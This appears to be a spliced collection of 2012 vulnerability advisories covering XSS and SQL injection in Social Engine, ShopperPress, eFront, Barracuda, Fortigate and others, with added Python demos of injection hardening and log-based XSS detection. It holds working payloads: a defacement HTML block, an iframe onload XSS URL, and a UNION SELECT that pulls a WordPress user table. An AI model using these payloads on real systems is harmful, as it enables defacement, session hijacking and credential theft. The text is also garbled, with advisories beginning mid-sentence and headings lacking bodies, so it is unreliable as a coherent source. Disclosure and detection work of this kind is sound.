Medium

Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected in the Social Engine v4.2.5 web application. The bug allows attackers to inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the add-new videos and classifieds modules with the bound vulnerable tag (keywords) parameter. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction but a privileged user account.

Vulnerable Module(s):
  [+] Add New Video
  [+] Add New Classifieds

Affected Module(s):
  [+] Videos Listing Page
  [+] Classifieds Listing Page

Vulnerable Parameter(s):
  [+] Tags (keywords)

1.2
A non persistent cross site scripting vulnerability is detected in the Social Engine v4.2.5 web application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user interaction or a local low privileged user account. The bug is located in the signup (profile) module with the bound vulnerable name and address parameters. Successful exploitation can result in account theft, client-side phishing and client-side content request manipulation. Exploitation requires medium or high user interaction without a privileged web application user account.

Vulnerable Module(s):
  [+] Profile - Signup

Vulnerable Parameter(s):
  [+] Name & Address

Proof of Concept:
=================
1.1
The persistent vulnerability can be exploited by remote attackers with low required user interaction and a low privileged application user account.
For demonstration or reproduce ...

- In the Post New Video Page (http://127.0.0.1:8080/videos/create)
  Information: Copy & Paste persistent malicious script code (js/html) into the Tags (keywords) field and save the context

- In the Post New Classifieds Listing Page (http://127.0.0.1:8080/classifieds/create)
  Information: Copy & Paste persistent malicious script code (js/html) into the Tags (keywords) field and save the context

Picture : http://i47.tinypic.com/2ptcv29.png
Picture : http://i50.tinypic.com/14soaci.png

PoC:
DIV align=left DIV id=Layer1 style=BORDER-RIGHT: #00 1px; BORDER-TOP: #00 1px; 1; LEFT: 1px; BORDER-LEFT: #00 1px; WIDTH: 1500px; BORDER-BOTTOM: #00 1px; POSITION: absolute; TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #00; layer-background-color: #00 br /br / br center font face=Arial color=red size=4strongbrbrbrDefaced By : X-Cisadane br /center font face=Courier New color=#FF size=3centerGreetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Winda Utari/center/font centerimg src=http://obnoxiousgamer.files.wordpress.com/2010/01/jollyroger.gif;/img/center centerfont face=arial size=3 color=#FF marquee behavior=alternate scrolldelay=100 style=width: 90%Please fix your hole! /li /ul /td /tr /table /div

1.2
The non persistent cross site scripting vulnerability can be exploited by remote attackers with medium or high required user interaction and without a privileged user account.
For demonstration or reproduce ...

Information: Copy & Paste cross site scripting (script code) into the Profile Address field of the signup form
URL: http://127.0.0.1:8080/signup

Picture : http://i45.tinypic.com/v46iyd.png
Picture : http://i49.tinypic.com/156e79h.png

Risk:
=====
1.1
The security risk of the persistent web vulnerabilities is estimated as medium(+).

1.2
The security risk of the client side cross site scripting vulnerability is estimated as low(+).

Credits:
========
X-Cisadane
ShopperPress v2.7 Wordpress - SQL Injection Vulnerability
Title:
======
ShopperPress v2.7 Wordpress - SQL Injection Vulnerability

Date:
=====
2012-08-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=669

VL-ID:
======
669

Common Vulnerability Scoring System:
====================================
6.1

Introduction:
=============
ShopperPress is a premium Wordpress theme with an addon that transforms Wordpress into a fully functional online store with shopping cart functionality. ShopperPress is the ideal solution for anyone who wants to sell products, services, digital downloads or affiliate products online; you can even set up a catalog website. ShopperPress has been designed and tested to make setup and store management easy. Suitable for users of all levels, ShopperPress makes running an online store enjoyable whilst giving you all the professional tools required. ShopperPress has been optimized for search engines, helping your store quickly rank high in all major search engines. You can also add on Wordpress SEO plugins to help you customize meta tags and page titles. ShopperPress can create online stores, affiliate stores and even catalog websites. Every copy of ShopperPress includes Amazon, Ebay and CSV import tools, 20+ payment gateways, 20+ store designs, shipping, tax, promotions, coupons, emails and lots more! ShopperPress includes 20+ different payment gateways allowing you to choose how your visitors pay for your products/services. We have integration for Paypal (standard and Pro), 2Checkout, Worldpay, eWay, Google Checkout, Authorize.net and lots more. Built into ShopperPress are 20+ different store designs to choose from, all included free! Customizing your theme is quick and easy using the on/off display options found in the admin area, with full support for plugins and widgets. ShopperPress has a built-in order management system allowing you to manage your orders. You can easily view your order history, export to CSV, view product, billing and shipping details as well as print off customer invoices.

With ShopperPress you can create custom product options such as colors and sizes. You can create up to 6 different product values which will be passed with the product to checkout, as well as allow members to upload files. [24/7 Customer Support] We work hard to ensure our customers are 100% satisfied with our product, which is why we offer a 24/7 customer support service.

(Copy of the Vendor Website: http://shopperpress.com )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a SQL Injection vulnerability in the ShopperPress official premium Wordpress theme and addon v2.7.

Report-Timeline:
================
2012-08-01: Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A SQL Injection vulnerability is detected in the ShopperPress official premium Wordpress theme and addon v2.7. Remote attackers with a privileged user account (module access) can inject and execute their own SQL commands to compromise the Wordpress application DBMS. The vulnerability is located in the listing module, in the vulnerable id parameter of the edit function. Exploitation requires a privileged user account or module access rights. The verbose MySQL error returned to the client (see the exception log below) confirms the injection point and discloses the structure of the affected statement (... GROUP BY order_id LIMIT 1).

Vulnerable Module(s):
[+] Listing - [Edit]

Vulnerable Parameter(s):
[+] id

Proof of Concept:
=================
The SQL injection vulnerability can be exploited by a privileged Wordpress user account without user interaction. For demonstration or reproduce ...

PoC:
http://shopperpress.127.0.0.1:38/wp-admin/admin.php?page=orders&id=5-261343282-1%27union select[SQL-INJECTION!]--

--- SQL Exception Logs ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[SQL-INJECTION!]' GROUP BY order_id LIMIT 1' at line 1 on line: 80

Solution:
=========
The vulnerability can be patched by parsing (type-checking and binding) the id parameter in the edit functions of the addon module files.

Risk:
=====
The security risk of the SQL injection vulnerability is estimated as high(-).
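The bug class described above, as an added example: this is not ShopperPress code and not from the advisory. It reconstructs the query shape that the quoted MySQL error reveals (a quoted id followed by GROUP BY order_id LIMIT 1) against a constructed SQLite database, fills the advisory's [SQL-INJECTION!] placeholder with a UNION that pulls the user table, and shows the hardened form: parse the parameter to the column's type, then bind it. The table names, the hash and the payload suffix are assumptions; the WordPress-native equivalent of get_order_safe() is absint() on the parameter followed by $wpdb->prepare() with a %d placeholder.

```python
import sqlite3

# Constructed sample data standing in for the shop's tables (not from the advisory).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE orders   (order_id INTEGER PRIMARY KEY, status TEXT);
        CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
        INSERT INTO orders   VALUES (5, 'paid');
        INSERT INTO wp_users VALUES ('admin', '$P$B-constructed-phpass-hash');
    """)
    return conn

def get_order_vulnerable(conn, order_id):
    # Hypothetical reconstruction of the reported bug: the id parameter is
    # concatenated straight into the statement. The MySQL error quoted in the
    # advisory ("... GROUP BY order_id LIMIT 1") shows this query shape.
    sql = ("SELECT order_id, status FROM orders WHERE order_id = '%s' "
           "GROUP BY order_id LIMIT 1" % order_id)
    return conn.execute(sql).fetchall()

def get_order_safe(conn, order_id):
    # Hardened form: parse the parameter to the type the column has, then bind it.
    # WordPress: $id = absint($_GET['id']); $wpdb->get_row($wpdb->prepare("... = %d", $id));
    oid = int(order_id)  # raises ValueError for anything that is not an integer
    return conn.execute(
        "SELECT order_id, status FROM orders WHERE order_id = ? "
        "GROUP BY order_id LIMIT 1", (oid,)).fetchall()

# The advisory's payload prefix with the [SQL-INJECTION!] placeholder filled in for
# this demo: a UNION that appends the credentials table, then comments out the tail.
PAYLOAD = "5-261343282-1' UNION SELECT user_login, user_pass FROM wp_users -- "

def demo():
    conn = make_db()
    leaked = get_order_vulnerable(conn, PAYLOAD)   # attacker receives wp_users rows
    try:
        get_order_safe(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True                              # rejected before it reaches SQL
    legit = get_order_safe(conn, "5")               # a normal request still works
    return leaked, blocked, legit

if __name__ == "__main__":
    print(demo())
```

The point of the int() step is that the parameter never reaches the SQL layer as text at all; binding alone would also stop the injection, but rejecting non-integers up front keeps the verbose database error (itself an information leak in the advisory) from ever being produced.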
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
ShopperPress v2.7 Wordpress - Cross Site Vulnerabilities
; color:#666;padding:5px; value=Search Files /form div class=clearfix/div form class=plain method=post name=orderform id=orderform input type=hidden name=deleteimages value=1

Review: Member Add/Edit Listing
ul lia rel=premiumpress_tab1 href=# class=active Details/a/li lia href=# onclick=window.location.href='admin.php?page=orders&cid=5[CLIENT SIDE MALICIOUS SCRIPT CODE]) width=800 Order History/a/li !--lia href=admin.php?page=members Search Results/a/li-- /ul /div div id=videobox1/div form method=post target=_self enctype=multipart/form-data input name=action type=hidden value=edit / input name=userdata[ID] type=hidden value=5[CLIENT SIDE MALICIOUS SCRIPT CODE]) / input type=hidden value= name=showThisTab id=showThisTab / div id=premiumpress_tab1 class=content

Review: EMail Add/Edit
div id=premiumpress_tab1 class=content form class=fields method=post target=_self enctype=multipart/form-data input name=action value=edit type=hidden input name=ID value= type=hidden[CLIENT SIDE MALICIOUS SCRIPT CODE];) width=800 input type=hidden name=form[email_type] value=email / fieldset div class=title h3 Email Options/h3 /div

Solution:
=========
The vulnerability can be patched by parsing (encoding on output) the orders, id and search web application parameters before they are written back into the admin page.

Risk:
=====
The security risk of the non-persistent cross site scripting vulnerabilities is estimated as medium(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Nike+ Panel Mobile App - Multiple Web Vulnerabilities
Title:
======
Nike+ Panel Mobile App - Multiple Web Vulnerabilities

Date:
=====
2012-08-01

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=663

VL-ID:
======
663

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
The Nike+ FuelBand records your daily activity through a sports-tested three-axis accelerometer and converts every movement into NikeFuel. It tracks running, walking, dancing, basketball and the results of a wide range of everyday activities. You can also sync the results with a motivating mobile website. So: put it on and get going. How active do you want to be? Set your daily goal. The Nike+ FuelBand measures your progress and shows it over the course of the day with a colour display that goes from red to green. When you reach the green zone, you have hit your goal. Turn every day into a new game. Break records, reach new milestones and unlock special achievements. Ride the wave of success and see how many days in a row you can reach your daily goal.

(Copy of the Homepage: http://nikeplus.nike.com/plus/ )

A Nike+ FuelBand is required to use this app. You must have iOS 5.0 or above installed to use the Nike+ FuelBand app.

Description
Nike+ FuelBand measures your everyday activity and turns it into NikeFuel. It also tracks each step and calorie burned. The App talks to your Nike+ FuelBand, allowing you to see your progress on your mobile device and get the motivation you need to get moving.

• Sync wirelessly, set your Daily Goal directly from the App and decide how much NikeFuel you want to earn that day.
• Sync your Nike+ FuelBand throughout the day to track your NikeFuel and try to hit your Daily Goal.
• See your daily activity breakdown and view your progress by week, month, or year.
• View your achievement celebrations and save your badges in your trophy case. Bragging optional.
• Connect, compare and compete with your Facebook friends. See your daily and weekly NikeFuel totals on a social leaderboard.
• Keep track of your streaks. See how many days in a row you can reach your Daily Goal.
• Keep track of your personal bests. Set your records and try to break them.
• Get notified every time you earn a trophy, beat a record, or reach a milestone.
• Manage your Nike+ profile and settings on the go.
• Write about your day and keep a personal record of how you felt. See what makes you tick.
• Share your NikeFuel and achievements with friends on Facebook and Twitter. Get cheered on and stay motivated.
• Stay connected to the rest of the Nike+ community.
• The app automatically sends all your information to your Nike+ profile online.
• Nike+ FuelBand Device required.

(Copy of the Homepage: http://itunes.apple.com/de/app/nike+-fuelband/id493325070?mt=8# )

Abstract:
=========
The Vulnerability-Lab Team discovered multiple web vulnerabilities in the Nike+ Control Panel FuelBand mobile web application.

Report-Timeline:
================
2012-04-06: Researcher Notification & Coordination
2012-05-28: Vendor Notification 1
2012-06-09: Vendor Notification 2
2012-07-22: Vendor Notification 3
2012-08-01: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities are detected in the Nike+ Control Panel FuelBand mobile web application. The bugs allow an attacker to inject malicious script code on the application side (persistent).

The first persistent vulnerability is located in the profile username input, bound to the vulnerable "normal_font" name listing. The persistent code is executed from the username listing of the mobile application and from the Nike+ index panel username/profile listing.

The second persistent vulnerability is located in the Facebook friends module, in the bound vulnerable Facebook friend name listing. The persistent code is executed from the friends (management) view when a user whose Facebook name carries the malicious string is added.

The third vulnerability is located in the Nike+ member search module, in the bound vulnerable "alt_header_font" title listing. It is a client-side issue that triggers when a registered malicious username is searched for; by injecting script code directly, without an existing user, the code is executed on the client side of the search module.

Successful exploitation of the vulnerabilities can lead to persistent session hijacking (manager/admin) or stable (persistent) context manipulation in mobile apps or panels via sync. Exploitation requires low user inter
ManageEngine OpStor v7.4 - Multiple Web Vulnerabilities
PoC:
http://opstor.127.0.0.1:1338/availability730.do?days=<iframe src=http://www.vuln-lab.com onload=alert(XSS)></iframe>&name=<iframe src=http://www.vuln-lab.com onload=alert(XSS)></iframe>

Solution:
=========
2012-08-07: Vendor Fix/Patch

Manual steps to apply the patch/fix:
1. Download the patch and place it in the AppManager_home directory. (AppManager_home is the directory in which Applications Manager is installed; the default location is C://Program Files (x86)/ManageEngine/AppManager10.)
2. Extract the patch under AppManager_home. If prompted to replace a file, replace the existing file with the file from the patch (or extract the zip file and copy the server.xml from the zip to the location shown in the structure below).
3. After extracting, ensure you have the server.xml file as per the structure below:
   AppManager_home
   |
   .working
   ...apache
   ...tomcat
   ...conf
   ...backup
   .server.xml
4. Shut down the Applications Manager software.
5. Rename the Logs folder path or variable.
6. Start Applications Manager after the change.
7. Done!

PATCH DOWNLOAD: http://bonitas.zohocorp.com/customer_uploads/2012_8_16_10_12_39_BadInput_10600.zip

Risk:
=====
1.1 The security risk of the blind SQL injection vulnerability is estimated as critical.
1.2 The security risk of the persistent input validation vulnerability is estimated as medium(+).
1.3 The security risk of the client-side cross site scripting vulnerabilities is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
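Reflected payloads like the OpStor PoC above travel in the query string, so an ordinary web-server access log is enough to find them after the fact. The following is an added detection example, not ManageEngine code and not part of the advisory: it parses constructed Common Log Format lines (line 2 is modelled on the days= payload, URL-encoded as a browser would send it), decodes every parameter and flags two things: values containing HTML/JS injection markers, and non-numeric values in a parameter that should only ever carry an integer. That availability730.do treats days as an integer is an assumption made for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines in Common Log Format (not real OpStor logs).
# Line 2 carries an encoded <iframe onload=...> in days=, line 3 a <script> in name=.
SAMPLE_LOG = """\
10.0.0.7 - - [07/Aug/2012:10:12:39 +0200] "GET /availability730.do?days=7 HTTP/1.1" 200 5120
10.0.0.9 - - [07/Aug/2012:10:13:02 +0200] "GET /availability730.do?days=%3Ciframe%20src%3Dhttp%3A%2F%2Fwww.vuln-lab.com%20onload%3Dalert%28%22XSS%22%29%3E%3C%2Fiframe%3E&name=x HTTP/1.1" 200 5300
10.0.0.9 - - [07/Aug/2012:10:13:05 +0200] "GET /availability730.do?days=7&name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5300
10.0.0.7 - - [07/Aug/2012:10:14:00 +0200] "GET /report.do?title=Onload%20monitoring HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Markers that only make sense if the parameter is meant to be written back into HTML.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*(iframe|script|img|svg|body|object|embed)\b"       # tag opener
    r"|\bon(load|error|click|mouse\w+|focus|blur|key\w+)\s*="    # inline handler
    r"|javascript\s*:",                                           # javascript: URL
    re.IGNORECASE,
)

# Assumption for this example: availability730.do treats days as an integer,
# so anything else in that parameter is a protocol violation worth a look.
INTEGER_PARAMS = {"days"}

def classify(line):
    """Return [(param, reason), ...] for one access-log line; empty if clean."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    findings = []
    query = urlsplit(match.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote_plus(value)      # second pass catches double-encoded payloads
        if name in INTEGER_PARAMS and not decoded.isdigit():
            findings.append((name, "type-violation"))
        if XSS_MARKERS.search(decoded):
            findings.append((name, "xss-marker"))
    return findings

def scan(log_text):
    """Map line number -> findings for every suspicious line in the log."""
    hits = {}
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        findings = classify(line)
        if findings:
            hits[lineno] = findings
    return hits

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, findings)
```

The type check is the higher-precision signal: a marker list can be evaded with encodings or tags it does not know, whereas "days is not an integer" holds for every probe against that parameter. The marker list is deliberately short; widening the handler alternation to every on* name increases recall at the cost of false positives on parameters that merely start with "on".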
eFront Educational v3.6.11 - Multiple Web Vulnerabilities
Title:
======
eFront Educational v3.6.11 - Multiple Web Vulnerabilities

Date:
=====
2012-08-03

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=666

VL-ID:
======
666

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
Tailored with larger organizations in mind, eFront Educational offers solutions for the management of a company's most valued asset - its people. Based on a coherent approach to human capital management which keeps the workforce actively engaged, the eFront Educational platform offers the means of aligning learning programs with business goals to cultivate the employee skills and knowledge associated with business performance. eFront Enterprise builds on top of eFront Educational.

(Copy of the Vendor Homepage: http://efrontlearning.net/product/ )

Abstract:
=========
A researcher of the Vulnerability Laboratory Team discovered multiple web vulnerabilities in eFront Educational v3.6.11.

Report-Timeline:
================
2011-08-03: Public Disclosure

Status:
=======
Published

Affected Products:
==================
eFront
Product: Educational v3.6.11

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities are detected in the eFront Educational v3.6.11 e-learning system. The vulnerabilities allow remote attackers to inject malicious script code on the application side (persistent).

The first vulnerability is located in the profile module, in the vulnerable firstname and lastname parameters. It allows a low privileged student account to attack higher privileged trainer or administrator accounts via registration: the injected name is stored and rendered unencoded in the administrator's user listing. Exploitation of the first vulnerability requires a low privileged student account on the e-learning application.

The second vulnerability is located in the Messages - New Folder Name module, in the vulnerable folder listing. Exploitation of the second vulnerability requires a low privileged student account and is only locally exploitable, since the payload is rendered in the student's own folder listing.

Successful exploitation of the vulnerabilities can lead to persistent session hijacking (manager/admin) or stable (persistent) context manipulation.

Vulnerable Module(s):
[+] Profile - User (Administrator User Listing)
[+] Messages

Vulnerable Parameter(s):
[+] Firstname & Lastname
[+] Foldername

Proof of Concept:
=================
The persistent input validation vulnerabilities can be exploited by a remote attacker with a low privileged student account. For demonstration or reproduce ...

Review: Administrator - User Listing (Firstname Lastname)
tr id=row_student class=oddRowColor td a href=http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personal&user=student; class=editLink span id=column_student iframe src=administrator.php-[PERSISTENT INJECTED SCRIPT CODE!])' = d.= (student)= span=/a/td

Affected URL(s):
http://efront.127.0.0.1:137/educational/www/student.php?ctg=personal&user=student&op=profile
http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=users
http://efront.127.0.0.1:137/educational/www/administrator.php?ctg=personal&user=student&op=profile

Review: Messages - Add New Folder Name - Listing
td span class=counter 4. /span a href=http://efront.127.0.0.1:137/educational/www/student.php?ctg=messages;folder=10 iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])' (0= messages,= 0kb)= a= /td td

Risk:
=====
The security risk of the persistent web vulnerabilities is estimated as high(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
eFront Enterprise v3.6.11 - Multiple Web Vulnerabilities
%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]'); iframe src=student-[PERSISTENT INJECTED SCRIPT CODE!])' = a= span id=edit_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!] style=display:none input type=text value=[PERSISTENT INJECTED SCRIPT CODE!]) onkeypress=if (event.which == 13 || event.keyCode == 13) {Element.extend(this).next().down().onclick(); return false;} / a href=javascript:void(0) img id=editImage_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%2F%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!] src='themes/default/images/others/transparent.gif' class='sprite16 sprite16-success' style=vertical-align:middle onclick=editFile(this, $('span_%2Fvar%2Fwww%2Fvhosts%2Fdemo%2Fenterprise%2Fupload%2Ftrainee%2Fmodule_hcd%2Fpublic%[PERSISTENT INJECTED SCRIPT CODE!]').innerHTML, Element.extend(this).up().previous().value, 'directory','\[PERSISTENT INJECTED SCRIPT CODE!]) ') border=0 /a /span /td td /td td 27 Jul 2012, 23:38 /td

URL: http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personal&user=trainee&op=files

The injection point in this listing is the name of a file or directory created by the trainee in the personal files module: the encoded %22%3E%3C sequence preceding the payload marker is the "><" attribute break-out, and the element ids carry the full server-side upload path (/var/www/vhosts/demo/enterprise/upload/trainee/module_hcd/public/), which is itself an information disclosure.

Review: PANEL Index - Write something about yourself (Only locally exploitable!)
td span class=leftOption Trainee D. (trainee) /span span style= id=statusText onclick=javascript:showStatusChange() i iframe src=student3-[PERSISTENT INJECTED SCRIPT CODE!])' = i=/iframe /i /span input class=inputText id=inputStatusText style=display: none; value=[PERSISTENT INJECTED SCRIPT CODE!];) onblur=changeStatus() img style=visibility: visible; progressimage=anonymous_element_16 id=statusTextProgressImg src=student3-Dateien/transparent.gif class=ajaxHandle sprite32 sprite32-edit alt=Click to change status title=Click to change status onclick=javascript:showStatusChange() /td

URL: http://efront.127.0.0.1:1339/enterprise/www/student.php?ctg=personal&user=trainee&op=dashboard

Risk:
=====
The security risk of the persistent web vulnerabilities is estimated as high(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities
Title:
======
Barracuda Web Filter 910 5.0.015 - Multiple Vulnerabilities

Date:
=====
2012-08-02

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=570
Barracuda Networks Security ID: BNSEC-279/BNYF-5533

VL-ID:
======
570

Common Vulnerability Scoring System:
====================================
4.5

Introduction:
=============
The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful, easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware from your organization. No more productivity loss trying to repair computers or make computers usable again.

- Blocks access to Web sites based on domain, URL pattern, or content category
- Blocks downloads based on file type
- Blocks applications that access the Internet, including IM, music services, and software update utilities
- Integrates with safe search filters built into popular image search engines
- Provides integrated gateway and desktop spyware protection
- Uses Barracuda Web Security Agents compatible with Windows PCs and Macs to enforce Internet policies on off-network computers

The Barracuda Web Filter combines preventative, reactive, and proactive measures to form a complete Web filtering solution. Designed for the enterprise, the Barracuda Web Filter enables you to set up custom policies for particular users and groups across customizable time ranges. The Barracuda Web Filter integrates with popular LDAP directory servers, such as Microsoft Active Directory, for both authentication and group membership information on which to apply custom policies.

Sample uses of group policies include:
- Restricting access to job board Web sites to only the Human Resources group
- Defining separate policies for teachers and students at a school
- Enabling compliance officers unrestricted access to the Web for investigation
- Providing external instant messaging (e.g., AIM) access only to specific users or groups
- Restricting personal Web browsing to non-working hours

For organizations that do not utilize directory servers, policies can be defined for unauthenticated users as a whole, locally defined users and groups, or network IP address ranges.

(Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-filter-overview.php )

Abstract:
=========
The Vulnerability Lab Research Team discovered multiple web vulnerabilities in Barracuda's Web Filter application v5.0.0.015, appliance model 910.

Report-Timeline:
================
2012-05-01: Researcher Notification & Coordination
2012-05-08: Vendor Notification
2012-06-13: Vendor Response/Feedback
2012-07-25: Vendor Fix/Patch
2012-08-02: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Barracuda Networks
Product: Barracuda Web Filter Appliance 910 v5.0.0.015

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple persistent input validation vulnerabilities are detected in Barracuda's Web Filter application v5.0.0.015, appliance model 910. The bugs allow remote attackers to inject malicious script code on the application side (persistent). Successful exploitation can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction.

The first vulnerability is located in the NTLM Edit - Server Hostname / Domain Name field, which is bound to the affected Existing Authentication Services listing. Because the hostname is stored in the appliance configuration and rendered back into that listing, the payload fires for every administrator who opens the page. Another vulnerability is located on the Upload Keytab tab, in combination with the unsanitized Short Domain Name input field and its output listing.

Vulnerable Module(s):
[+] Authentication > New Authentication Service
    [-] NTLM - Server Hostname / Domain Name - Existing Authentication Services
[+] Authentication > Kerberos > Advanced Settings
    [-] Upload Keytab File in combination with alternative Short Domain Name

Picture(s):
../1.png
../2.png

Proof of Concept:
=================
The persistent web vulnerabilities can be exploited by remote attackers with high[-] (medium+) user interaction, or via a local low privileged user account with low required user interaction. For demonstration or reproduce ...

Review: NTLM Edit Listing
td colspan=2 style= valign=top width=285 input autocomplete=off id=UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg name=UPDATE_ntlm_server_hostname:md5UBwQ8iCjrc1egk1wTV8SEg size=30 value=[PERSISTENT SCRIPT CODE EXECUTION!] type=text br div nowrap
Knowledge Base EE v4.62.0 - SQL Injection Vulnerability
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities
Title:
======
Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities

Date:
=====
2012-09-06

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=557

VL-ID:
=====
557

Common Vulnerability Scoring System:
====================================
5

Introduction:
=============
The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including:

* Firewall, VPN, and Traffic Shaping
* Intrusion Prevention System (IPS)
* Antivirus/Antispyware/Antimalware
* Web Filtering
* Antispam
* Application Control (e.g., IM and P2P)
* VoIP Support (H.323. and SCCP)
* Layer 2/3 routing
* Multiple WAN interface options

FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies.

Since 2009 the Fortigate appliance series has been certified by the U.S. Army and is now listed in the Information Assurance Approved Products List (IA APL). The military provides high security standards to secure outdoor camps, air bases and offices with Fortigate hardware.

(Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate )

Abstract:
=========
The Vulnerability-Lab Research Team discovered multiple persistent web vulnerabilities in the FortiGate UTM Appliance Application.

Report-Timeline:
================
2012-05-06: Researcher Notification & Coordination
2012-05-10: Vendor Notification
2012-06-11: Vendor Response/Feedback
2012-08-25: Vendor Fix/Patch (Fixed in FortiOS v4.3.8 B0537; Fixed in FortiOS v5.0)
2012-09-06: Public or Non-Public Disclosure

Status:
=======
Published

Affected Products:
==================
Fortigate
Product: UTM Appliance Application vFortiGate-5000 Series; FortiGate-3950 Series; FortiGate-3810A

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
Multiple persistent input validation vulnerabilities are detected in the FortiGate UTM Appliance Application. Remote attackers with low privileged user accounts can inject their own persistent malicious script code to manipulate specific customer/admin requests. The vulnerability allows a local low privileged attacker to manipulate the appliance (application) via persistent script code injection. The vulnerability is located in the Add or Tags module category listing with the bound vulnerable applied tags / tags display parameters. Successful exploitation results in content module request manipulation, execution of persistent malicious script code, session hijacking, account theft and persistent phishing.

Vulnerable Module(s): (Persistent)
[+] Tags - Applied tags
[+] Add - Tags Display

Interface - UTM WAF Web Application [Appliance]
FortiGate-5000 Series; FortiGate-3950 Series; FortiGate-3810A; FortiGate-3600A; FortiGate-3016B; FortiGate-1240B; FortiGate-800; FortiGate-620B; FortiGate-311B; FortiGate-310B; FortiGate-300A; FortiGate-224B; FortiGate-200B Series

Proof of Concept:
=================
The persistent vulnerabilities can be exploited by remote attackers with low required user interaction or a low privileged user account. For demonstration or reproduce ...
Code Review: Tags - Applied tags [Box] Listing
URL: http://appliance.127.0.0.1:1337/firewall/policy/policy6?expanded=#

name=``addr_dlg`` action=``/firewall/address/add`` onsubmit=``if (!fwad_form_check('Please choose one address/group.', 'Please choose one interface to connect.')) return false; if (document.forms[0].submitFlag) return false; document.forms[0]. submitFlag = true;`` tabletbodytr td align=``left`` width=``150``nobrAddress Name/nobr/td td align=``left``input name=``name`` size=``64`` maxlength=``63`` value=``all`` type=``text`` /td /tr tr tdColor/td tdspan colorclassprefix=``addr_ipv6_ `` class=``icon_fw addr_ipv6_13`` id=``addressIcon``/span a href=``#`` id=``addressColor`` cscolorvalue=``0``[Change]input value=``13`` name=``csColor1`` type
ASTPP VoIP Billing (4cf207a) - Multiple Web Vulnerabilities
